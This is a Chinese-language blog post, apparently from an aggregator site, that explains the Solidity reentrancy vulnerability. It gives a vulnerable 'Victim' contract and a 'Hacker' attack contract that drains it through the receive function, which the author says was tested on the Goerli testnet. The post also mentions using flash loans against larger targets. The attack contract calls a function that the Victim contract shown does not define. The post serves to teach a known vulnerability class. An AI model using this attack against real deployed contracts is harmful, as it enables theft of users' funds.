当前位置: 首页 > news >正文

重入漏洞Victim

重入漏洞

顾名思义,重入漏洞可以简单理解为“重新进入的漏洞”。举个简单的例子,你往某个合约里存入了1个Ether,然后点击退款,按理来说只能退一个Ether,但是可以利用重入漏洞反复退款,把合约里的Ether掏空。
以下,是一个有重入漏洞的合约,合约命名为Victim(受害者),主要实现几个功能:1)存款:用户往合约里存款,并给用户在合约里的账户记账(加);2)查询此合约的存款余额;3)取款:将用户之前存入的Ether转给用户并记账(减)。

//SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;contract Victim {mapping(address => uint256) public balance;function deposit() public payable {//存款函数balance[msg.sender] += msg.value;//存款后往用户账户上记账}function getBalance(address account) public view returns (uint256) {//查看余额函数return balance[account];//返回用户账上的记录}function withdraw() public {//取款函数uint256 currentBalance = balance[msg.sender];//获取用户当前在合约里的余额并赋值给currentBalancerequire(currentBalance > 0);//要求用户当前在合约的余额大于0(bool successful, ) = msg.sender.call{value: currentBalance}("");//调用call函数给用户退款(转Ether),如果成功就赋值successful为truerequire(successful, "Failed to withdraw Ether");//要求successful为truebalance[msg.sender] = 0;//记账:将用户当前在合约里的余额清空}
}

问题出在这三行:

(bool successful, ) = msg.sender.call{value: currentBalance}("");//调用call函数给用户退款(转Ether),如果成功就赋值successful为true
require(successful, "Failed to withdraw Ether");//要求successful为true
balance[msg.sender] = 0;//记账:将用户当前在合约里的余额清空

第一行中,受害合约使用call给合约调用者转Ether,但是并不知道调用受害合约的是钱包地址(EOA)还是合约地址(contract)。如果调用受害合约的退款函数的是一个合约地址,那么可以做文章的地方就来了。

合约和钱包地址不太一样,并不是默认接收Ether的。一个合约要想接受别人发送的Ether,需要有receive函数或者fallback函数,也就是说,一个能接受Ether的合约在接收Ether的时候并非是被动接受,还会调用函数。

这一点我之前是没想通的,为什么给一个合约发送Ether还会调用对方的函数。如果是现实世界举例子,就像是你给一个公司的账户转账,会触发对方设定的一些条款(比如让你继续转账)。但是这就是Ethereum的特性。

如果我是攻击者,该怎么做?在我自己的合约的receive或者fallback函数里进行攻击。我在Goerli测试网部署的攻击合约如下,命名为Hacker(黑客):

//SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;//不方便引入,所以直接把Victim合约复制过来了
import "./victim.sol";contract Hacker {address owner;Victim victim;constructor (address _victim) {owner = msg.sender;victim = Victim(_victim);}modifier onlyOwner {require(msg.sender == owner);_;}function getBalance() public view returns(uint256) {return address(this).balance;}receive() external payable {if (victim.getContractBalance() >= 1 ether) {//①决定了漏洞合约里最终剩多少钱,一般是下面的msg.value减去这里的数值victim.withdraw();}}function attack() public payable onlyOwner {require(msg.value >= 1 ether);victim.deposit{value:msg.value}();//②这里的msg.value不能超过上面①处的数值,否则循环的最后一次漏洞合约里的Ether不够,转账失败,整个攻击就失败了victim.withdraw();}function withdrawToHacker() public onlyOwner {payable(msg.sender).transfer(address(this).balance);}
}

在重入的时候,每次退款的数额似乎会有不同的结果,我模拟的结果显示:往漏洞合约里转100E,然后分别使用1E/2E/4E/5E/10E(都能整除100)重入,只有10E成功,其他都报错了(可能和循环次数/堆栈有关?)。针对这种情况,如果目标合约里Ether较少,用自有资金攻击即可,但是如果目标合约的Ether较多,可能需要配合使用闪电贷。

http://www.lryc.cn/news/204270.html

相关文章:

  • wordpress数据库迁移Invalid default value for ‘comment_date‘
  • Xray联动RAD实现自动扫描教程
  • ES6 Proxy
  • LSKA(大可分离核注意力):重新思考CNN大核注意力设计
  • muduo源码学习base——Exception(带 stack trace 的异常基类)
  • 2023-10-24 小总结
  • 2-MySQL的基本操作记录
  • 网站页脚展示备案号并在新标签页中打开超链接
  • CentOS7 安装 nodejs
  • 工程化测试:Apollo的单元测试与集成测试指南
  • DevOps 笔记
  • 基于食肉植物优化的BP神经网络(分类应用) - 附代码
  • Docker部署SpringBoot +Vue项目流程详解(含域名 + HTTPS)
  • 需要在 MySQL 服务器中监控的重要指标
  • Hadoop之HDFS
  • 【Matlab笔记_17】查找数组中相同元素
  • 前端多媒体处理工具——ffmpeg的使用
  • Pandas 数据分析系列1--SeriesDataFrame数据结构详解
  • 【模型部署】c++部署yolov5使用openvino
  • DC-7 靶机
  • Mr.Alright---MTK安卓13 抬手亮屏功能的逻辑
  • thinkPHP5.0字符集修改为utf8mb4
  • [架构之路-242]:目标系统 - 纵向分层 - 应用程序的类型与演进过程(单机应用程序、网络应用程序、分布式应用程序、云端应用程序、云原生应用程序)
  • Jackson 反序列化失败,出现JSON: Unrecognized field
  • vscode代码快捷输入
  • 【微服务】Feign 整合 Sentinel,深入探索 Sentinel 的隔离和熔断降级规则,以及授权规则和自定义异常返回结果
  • Kurento多对多webrtc会议搭建测试
  • 蓝桥杯 (饮料换购,C++)
  • 《java核心卷Ⅰ》知识点总结(可作面试题)
  • 发成绩小程序,一键群发成绩给家长,省事